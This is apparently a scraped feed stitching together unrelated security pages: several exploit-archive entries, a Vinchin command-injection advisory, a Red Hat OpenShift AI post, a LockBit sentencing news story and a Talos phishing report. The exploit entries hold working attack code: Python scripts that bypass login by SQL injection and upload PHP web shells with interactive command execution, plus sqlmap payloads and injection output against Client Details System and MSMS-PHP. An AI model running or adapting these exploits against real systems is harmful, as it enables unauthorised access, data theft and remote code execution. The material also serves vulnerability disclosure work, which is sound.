Membership Management System version 1.0 suffers from remote shell upload and remote SQL injection vulnerabilities.

from requests_toolbelt.multipart.encoder import MultipartEncoder  
import requests  
import string  
import random  
import os

# ========================================================================================================

# Application: Membership Management System  
# Bugs: SQL injection + Insecure File Upload = Remote Code Execution  
# Date: 14.03.2024  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://codeastro.com/author/nbadmin/  
# Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/  
# Version: 1.0  
# --------------------------------------------------

# Vulnerability Description:

# The sql injection vulnerability was found in the file `Membership-PHP/index.php`

# The login page located at MembershipM-PHP/index.php contains a SQL Injection vulnerability.   
# This vulnerability allows attackers to inject malicious SQL code into the input fields used to provide login credentials.   
# Through this exploit, unauthorized users can gain access to sensitive data or even take control of the system.

# Vulnerable Code Section:

# $email = $_POST['email'];  
# $password = $_POST['password'];  
# $hashed_password = md5($password);  
# $sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";

# The Insecure File Upload vulnerability appeared in this file `MembershipM-PHP/settings.php` 

# The MembershipM-PHP/settings.php file contains an insecure file upload vulnerability.   
# This allows attackers to upload unauthorized files to the server and potentially execute remote code execution (RCE) attacks.

# Vulnerable Code Section:

# if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {  
#     $logoName = $_FILES['logo']['name'];  
#     $logoTmpName = $_FILES['logo']['tmp_name'];  
#     $logoType = $_FILES['logo']['type'];  
#     $uploadPath = 'uploads/';

#     $targetPath = $uploadPath . $logoName;  
#     if (move_uploaded_file($logoTmpName, $targetPath)) {

#         $updateSettingsQuery = "UPDATE settings SET system_name = '$systemName', logo = '$targetPath', currency = '$currency' WHERE id = 1";  
#         $updateSettingsResult = $conn->query($updateSettingsQuery);

#         if ($updateSettingsResult) {  
#             $successMessage = 'System settings updated successfully.';} else {  
#             $errorMessage = 'Error updating system settings: ' . $conn->error;}} else {  
#         $errorMessage = 'Error moving uploaded file.';}}

 # --------------------------------------------------

# reference : https://sospiro014.github.io/Membership-Management-System-RCE  
# I created the python code used in the exploit by looking at this https://www.exploit-db.com/exploits/50123 source and modifying it

# ========================================================================================================

# generate random string 8 chars  
def randomGen(size=8, chars=string.ascii_lowercase):  
    return ''.join(random.choice(chars) for _ in range(size))

# generating a random username and a random web shell file  
shellFile = randomGen() + ".php"

# creating a payload for the login  
payload = {  
    "email": "test@mail.com' or 0=0 #",  
    "password": "a",  
    "login": ""  
}

session = requests.Session()

# changeme  
urlBase = "http://172.17.86.197/" # change this target ip :)

# login  
url = urlBase + "index.php"  
print("=== executing SQL Injection ===")  
req = session.post(url, payload, allow_redirects=False)

# check if 'Set-Cookie' header is present in the response  
if 'Set-Cookie' in req.headers:  
    cookie = req.headers["Set-Cookie"]  
    print("=== authenticated admin cookie:" + cookie + " ===")  
else:  
    print("Set-Cookie header not found in the response.")  
    exit()

# upload shell  
url = urlBase + "settings.php"

# Get user input for the command to execute  
cmd_input = input("Enter the command to execute: ")

# PHP code to execute the command received from the user  
php_code = "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>"

mp_encoder = MultipartEncoder(  
    fields={  
        "systemName": "Membership System",  
        "currency": "$",  
        "logo": (shellFile, php_code, "application/x-php"),  
        "updateSettings": ""  
    }  
)

headers = {  
    "Cookie": cookie,  
    'Content-Type': mp_encoder.content_type  
}

print("=== login user and uploading shell " + shellFile + " ===")  
req = session.post(url, data=mp_encoder, allow_redirects=False, headers=headers)

# curl the shell for test  
requestUrl = "curl " + urlBase + "uploads/" + shellFile + "?cmd=" + cmd_input  
print("=== issuing the command: " + requestUrl + " ===")

print("=== CURL OUTPUT ===")  
os.system(requestUrl)

Membership Management System 1.0 SQL Injection / Shell Upload

Vinchin Backup and Recovery versions 7.2 and below suffer from an authentication command injection vulnerability.

    CVE ID: CVE-2024-25228Title: Authenticated Command Injection Vulnerability in ManoeuvreHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and EarlierDescription:A critical security vulnerability has been discovered in the `getVerifydiyResult` function within the `ManoeuvreHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, intended for validating IP addresses or web resources, is vulnerable to authenticated command injection due to insufficient input validation and sanitization.Function Analysis:- The function accepts an input array `$params`, focusing on the `type` and `value` keys.- Based on the `type`, it attempts to validate the input using either `verifyPing` (for IP addresses) or `verifyWeb` (for web resources).- The vulnerability specifically lies in the `verifyPing` method, where the `exec` function is used to execute a `ping` command with the user-supplied `value`, without proper validation or sanitization.Exploitation Risk:Authenticated attackers can exploit this vulnerability by injecting malicious commands into the `value` parameter. When processed by the vulnerable function, these commands can be executed on the server, leading to unauthorized access or control.Current Status:As of the latest available information, no patch has been released for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery. The vendor has not acknowledged the vulnerability.Recommendation:Users are advised to apply strict access controls to mitigate the risk posed by this vulnerability until an official patch is released. Monitoring for any updates from Vinchin regarding this issue is also recommended.Discoverer: Valentin Lobstein

Vinchin Backup And Recovery 7.2 Command Injection

Artificial intelligence (AI) has been evolving as one of the top priorities for organizations because of the increasing volume of data being generated from core data centers to the edge. Similarly, the adoption of Kubernetes in the past 10 years has resulted in improved scalability, reliability and business resilience.While Kubernetes has resulted in immense benefits, operational management and security continue to be challenging. Managing software supply chain integrity, monitoring the security of container images and runtime environments and enforcing compliance policies can be overwhelming.

Artificial intelligence (AI) has been evolving as one of the top priorities for organizations because of the increasing volume of data being generated from core data centers to the edge. Similarly, the adoption of Kubernetes in the past 10 years has resulted in improved scalability, reliability and business resilience.

While Kubernetes has resulted in immense benefits, operational management and security continue to be challenging. Managing software supply chain integrity, monitoring the security of container images and runtime environments and enforcing compliance policies can be overwhelming.

Organizations frequently experience challenges scaling AI and machine learning (AI/ML) use cases for enterprise-wide adoption. MLOps helps teams provision infrastructure, stage models, manage dependencies, orchestrate model calling and serve AI models in a scalable fashion to accelerate the time-to-value of AI/ML applications for organizations. MLOps has been gaining momentum with Kubernetes adoption for data models similar to how DevOps has been adopted for app development, providing self-healing, auto scalability, automated pipeline and many more capabilities.

An MLOps process constitutes five major steps:

1.  Data acquisition from different sources
2.  Data tuning and data validation
3.  Data model training
4.  Deploying models at scale to enable AI applications
5.  Continuous monitoring and modification of models and AI applications

Red Hat OpenShift AI is built using open source technologies, providing a flexible and scalable MLOps platform with tools to build, deploy and manage AI-enabled applications. It brings together a powerful suite of tools designed to make the process of fine-tuning and serving foundation models more seamless, scalable and efficient, simplifying the end-to-end data science process from model development to deployment.

Red Hat OpenShift Platform Plus serves as a foundation for MLOps, providing a collaborative environment for data scientists, analysts, operations and developers, resulting in a 210% return on investment and 20% improvement in data scientist efficiencies. OpenShift AI and OpenShift Platform Plus provide a more secure open hybrid cloud platform to run data science models, that enables tighter controls across application development, model provenance, governance and runtime threat detection.

Kubernetes misconfigurations are serious threats against containerized AI workloads because cybercriminals can exploit these settings to breach the enterprises (for example, enabling anonymous access with high privileges or getting access to data users aren’t allowed to access). Data model security must be considered early in the MLOps pipeline, and shouldn’t be an afterthought. OpenShift Platform Plus, along with its ecosystem partners, reduces complexity by enforcing security policies and providing a zero trust architecture for running AI models on the platform.

Here are 12 aspects of OpenShift Platform Plus that make this possible:

1.  **Red Hat Enterprise Linux CoreOS**: OpenShift runs on Red Hat Enterprise Linux CoreOS, providing the same rich automated and remote upgrade features of Red Hat Enterprise Linux (RHEL) while enhancing the security and experience for developers, data scientists and operations team.
2.  **Role Based Access Control (RBAC)**: RBAC allows fine-grained control over who has various access levels to the cluster, helping define strict boundaries between different projects and blocking unauthorized resource access.
3.  **Auditing and monitoring**: OpenShift provides the ability to audit and monitor the cluster in a variety of ways, including metrics, alerts, logs, dashboards, etc.
4.  **Context-based access control**: Red Hat Single Sign-On (SSO), included in OpenShift, provides identity federation based on SAML 2.0, OpenID Connect and OAuth 2.0.
5.  **Multifactor authentication**: OpenShift supports multiple identity providers, including active directory, LDAP, OpenID connect, etc.  
6.  **Quotas and limit range**: OpenShift allows you to enforce resource quotas per project to limit the damage from denial of service attacks. The namespace segregation and storage isolation are also enforced.
7.  **Compliance Operator**: This operator allows you to assess the required compliance state of the cluster as well as provide an overview of gaps and ways to remediate them.
8.  **Real-time vulnerability management**: Red Hat Advanced Cluster Security for Kubernetes helps detect and restrict network policy based on application ports and protocols.
9.  **Encryption**: Red Hat OpenShift Data Foundation supports cluster-wide encryption (encryption-at-rest) for all the disks and multicloud Object Gateway operations in the storage cluster.
10.  **Implement version control**: Quay.io helps prevent deploying of images with known vulnerabilities.
11.  **Secrets**: OpenShift provides a mechanism to store sensitive information such as passwords, configuration files and repository credentials to help avoid data poisoning.
12.  **Regularly updated container images**: OpenShift simplifies Day-2 activities and health checks to improve the speed at which vulnerabilities are addressed.

To summarize, Red Hat provides an enterprise-ready open hybrid cloud platform enabling self-service for data scientists and developers to integrate, streamline, automate and simplify the creation of a zero trust architecture for MLOps processes. Please reach out to your account team for more information.

Arun Mamgai has more than 18 years of experience in cloud-native application modernization, cybersecurity, open-source secure supply chain, data privacy, AI/machine learning, and digital transformation while working with Fortune 1000 customers across industries. He is responsible for building strategic relationship with technology leaders and promoting Red Hat OpenShift cloud-native application development platform, cybersecurity, and software supply chain solutions.

Read full bio

Niti comes with 20 years of experience in technology at different levels. From writing ANSI C applications on embedded devices to PHP based web applications to microservices on OpenShift, she has extensive knowledge on ‘how’ and ‘why’ of building applications. 

Read full bio

Zero Trust MLOps with OpenShift Platform Plus

By Deeba Ahmed
Mikhail Vasiliev, a Russian-Canadian citizen faces four years in a Canadian prison and is likely to be extradited to the US after completing his sentence.
This is a post from HackRead.com Read the original post: LockBit Affiliate Sentenced to 4 Years in Canada, Faces Extradition

Mikhail Vasiliev was also fined $860,000 for his involvement in the LockBit gang’s attacks. This case highlights the international effort to combat cybercrime and the severe consequences awaiting perpetrators.

A Russian-Canadian citizen, Mikhail Vasiliev, has been sentenced to nearly four years in prison for his involvement in the notorious **LockBit ransomware operation**. Vasiliev will also pay $860,000 in restitution to his Canadian victims.

Vasiliev’s lawyer reportedly argued that he turned to cybercrime due to financial difficulties during the **COVID-19 pandemic**.  However, Justice Michelle Fuerst rejected this justification, calling Vasiliev a _Cyber Terrorist_ whose actions were motivated by _greed_ and his crimes were “_far from_ _victimless crimes_.”

Investigations revealed Vasiliev’s role as a key member of the LockBit ransomware gang, involved in a significant number of cyberattacks with ransom demands ranging between €5m-€70 million. Vasiliev took responsibility for his actions, as confirmed by his lawyer Louis Strezos.

Vasiliev, 34, was arrested in October 2022 from his residence in Bradford, Ontario where he had moved from Moscow 20 years ago. He pleaded guilty in February 2024 to stealing victims’ computer data and using it for extortion.

Moreover, according to Canadian media **reports**, he admitted targeting at least three Canadian organizations, encrypting their data, and seeking ransom payments between 2021-2022, making $100 million in ransom demands for the gang from around 1,000 cyberattacks on victims in the U.S. and globally,

Vasiliev primarily targeted businesses in Saskatchewan, Montreal, and Newfoundland. His attacks likely caused significant disruptions and financial losses to the targeted businesses.

In November 2022, the US Department of Justice announced separate charges for his involvement in LockBit attacks. Vasiliev is set to be extradited to the U.S. for facing these additional charges

**LockBit, active since 2020**, operates under a ransomware-as-a-service (RaaS) business model, where affiliates exploit intrusions and deploy ransomware in exchange for some percentage of ransom payment.

In 2023, the gang gained significant profits from targeting companies like Boeing and Allen & Overy and exploited the **Citrix bleed security flaw** tracked as CVE-2023-4966 (CVSS score: 9.4).

LockBit’s infrastructure was **dismantled** by the law enforcement authorities in February 2024 as part of Operation Cronos with the seizure of 34 servers and 200 cryptocurrency accounts. Just a week after its seizure, LockBit **reemerged** with new leak sites, but RaaS is unlikely to recover. It claimed Operation Cronos was successful due to its negligence in updating PHP settings.

So far, Authorities have arrested six suspects in connection to LockBit, including Vasiliev, Ruslan Magomedovich Astamirov who was arrested **in June 2023**, two Russian nationals Artur Sungatov and Ivan Kondratyev, alias Bassterlord, and two others **arrested** in Ukraine and Poland.

Vasiliev’s potential extradition is a sign of growing international cooperation in combating cybercrime and serves as a warning to other gangs involved in such activities.

1.  Ragnar Locker Ransomware Dismantled, Key Suspect Arrested
2.  Alcasec Hacker, aka “Robin Hood of Spanish Hackers,” Arrested
3.  Operator of Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US
4.  LockBit ransomware blames victim for DDoS attack on its website
5.  Multimillion-Dollar Vishing Scam Busted: Czech-Ukrainian Gang Arrested

LockBit Affiliate Sentenced to 4 Years in Canada, Faces Extradition

Client Details System version 1.0 suffers from a remote SQL injection vulnerability.

    + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1+ **Date:** 2023-26-12+ **Exploit Author:** Hamdi Sevben+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip+ **Version:** 1.0+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53+ **CVE:** CVE-2023-7137## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140+ https://www.cve.org/CVERecord?id=CVE-2023-7137+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137## Description:Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.## Proof of Concept:+ Go to the User Login page: "http://localhost/clientdetails/"+ Fill email and password.+ Intercept the request via Burp Suite and send to Repeater.+ Copy and paste the request to a "r.txt" file.+ Captured Burp request:```POST /clientdetails/ HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/clientdetails/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36uemail=user@mail.com&login=LOG+IN&password=P@ass123```+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ```python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db``````---Parameter: uemail (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123---[14:58:11] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.53, PHP, PHP 8.1.6back-end DBMS: MySQL >= 5.0 (MariaDB fork)[14:58:11] [INFO] fetching current databasecurrent database: 'loginsystem'```+ current database: `loginsystem`![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

Client Details System 1.0 SQL Injection

MetaFox versions 5.1.8 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport requestsimport sysif len(sys.argv) != 4:   sys.exit("Usage: %s " % sys.argv[0])   requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = json.loads(response.text)if not "access_token" in json_response:   sys.exit("Login failed!")print("Login success! Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": ("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in json_response["data"][0]:   sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded at %s\n" % shell_url)while True:   command = input("$ ")   response = requests.post(shell_url, data={"command": command}, verify=False)   print(response.text)

MetaFox 5.1.8 Shell Upload

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

MSMS-PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.There is a change in response when nu11secur1ty' or 1=1# is injected.Potential SQLi detected. Please confirm it manually after you checkthe POST, GET, or other requests... The payload from thepuncher_SQLi_bypass_authentication module was submitted successfullyafter the test. The `search` parameter is vulnerable for Multiple SQLiattacks. The attacker can get all information from the system by usingthis vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: search (GET)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: p=products&search=-9068') OR 1 GROUP BYCONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: UNION query    Title: MySQL UNION query (random number) - 9 columns    Payload: p=products&search=-7515') UNION ALL SELECT2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:00:15:00

MSMS-PHP 1.0 SQL Injection

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks.

Wednesday, March 13, 2024 08:00

*   Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft and session token theft during recent incident response and threat intelligence engagements.
*   Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate.
*   DDP sites allow adversaries to quickly deploy and decommission malicious documents on a single platform. Talos IR also observed an adversary move between DDP sites within a short period.

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks. Threat actors have used a similar tactic of deploying phishing lures on well-known cloud storage and contract management sites such as Google Drive, OneDrive, SharePoint, DocuSign and Oneflow. However, DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls. Recent malicious activity observed across these platforms underscores the need for security teams to ensure that phishing protections and user awareness training programs consider these and similar sites.

**Background and observations**

 “Digital Document Publishing sites” refers to websites that allow users to upload and share PDF files in a browser-based flipbook format. Visitors can view an entire PDF by flipping from page to page without downloading the document, and some DDP sites offer features that allow other types of interaction with the document. Examples of DDP sites include Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo and SimpleBooklet.

The sites discussed in this blog are not malicious. Rather, they are being abused by threat actors.

**Delivery mechanism**

Threat actors integrate DDP sites as a secondary or intermediate stage of the attack chain, which follows tried-and-true phishing methods.

*   The victim receives an email containing a link to a document hosted on a legitimate DDP site. The email’s subject and/or body often includes the phrase “New Document from \[sender organization\],” and leaves the “To” header blank. Instead, the actors load the target list into the “BCC” field.
*   The DDP-hosted document includes a link to an external, adversary-controlled site.
*   When clicked, the link either moves the victim directly to the adversary-controlled site, or through a series of redirects. Talos IR also observed the inclusion of Cloudflare CAPTCHAs as part of some redirects, an adversary technique reported by Cofense, Netskope and other security teams over the past six months.
*   The victim arrives at the adversary-controlled site, which mimics a legitimate authentication page and is designed to capture user credentials or session tokens during authentication.

Attacks leveraging DDP sites for credential and session token theft often take place through unauthorized access to another legitimate email inbox. In a sort of “cascading” business email compromise (BEC) process, the threat actor creates infrastructure and phishing lures to target a specific victim, then leverages that victim’s established connections to conduct follow-on attacks against other organizations. A portion of the infrastructure created for the original target may be reused, while other portions are recreated to increase the likelihood of success during the subsequent attacks. 

**Lure customization**

DDP sites offer custom capabilities that lend credence to a phishing attack. Not only can the threat actor customize the uploaded phishing document, the web page hosting that document can also be modified. Page customization options include changing the background, banner, border or HTML Title tag. These quick configurations create more convincing lures and are likely to garner a higher click-through rate to the credential harvesting page. 

DDP-hosted lure customization observed during investigation ranged from pages listing the organization name only in the HTML Title tag, to a highly customized lure and landing page combination targeting users of a Canadian telecom provider. In the latter case, the final credential harvesting page was a near replica of the provider’s legitimate user login page, though it was hosted on an unrelated webwave\[.\]dev subdomain. 

**Historical trends**

Expanding the scope of the investigation to include historical data reveals a possible trend where threat actors migrate between DDP sites or rapidly activate and deactivate similar campaigns on the same site over time. For example, Talos IR observed a cluster of activity on SimpleBooklet from late October to early November 2020, and another on RelayTo in early September 2023. More recently, an adversary was observed operating the same credential-harvesting attack, first on Publuu, then later Issuu. 

